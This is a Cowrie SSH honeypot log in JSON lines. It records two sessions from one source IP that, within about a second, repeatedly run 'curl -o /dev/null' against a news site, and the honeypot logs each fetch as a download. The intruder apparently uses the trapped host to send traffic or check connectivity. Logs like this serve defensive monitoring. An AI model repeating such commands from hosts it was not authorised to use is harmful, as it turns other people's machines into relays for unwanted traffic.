{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.004026Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.013228Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.015012Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.015868Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.035150Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.036015Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.058647Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.059606Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.097601Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.098750Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.138003Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.138832Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.155051Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.155753Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.175978Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.176643Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.195990Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.196658Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.214566Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.215190Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.235011Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.247945Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.253242Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.253896Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.259296Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.268758Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.270829Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.294352Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.295180Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.297232Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.297899Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.301051Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.335915Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.339531Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.340653Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.380953Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.382128Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.407793Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.408750Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.436706Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.437257Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.443316Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.444051Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.474311Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.475158Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.479050Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.480217Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.512580Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.513135Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.516118Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.516970Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.566869Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.567846Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.570853Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.571827Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.612089Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.612893Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.616066Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.617306Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.651832Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.652818Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.655871Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.656985Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.690516Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.691423Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.695367Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.697546Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.733708Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.734510Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.737512Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.738257Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.771040Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.771880Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.775568Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.780761Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.782730Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.803829Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.813208Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.815049Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.823704Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.824399Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.830968Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.837886Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.846821Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.849700Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.851451Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.864422Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.865223Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.871097Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.871815Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.909704Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.910626Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.931175Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.931743Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.957160Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.957921Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.971436Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.972231Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:21.999061Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:21.999902Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.010489Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.011254Z","src_ip":"212.227.125.160","session":"7541ed730449"}
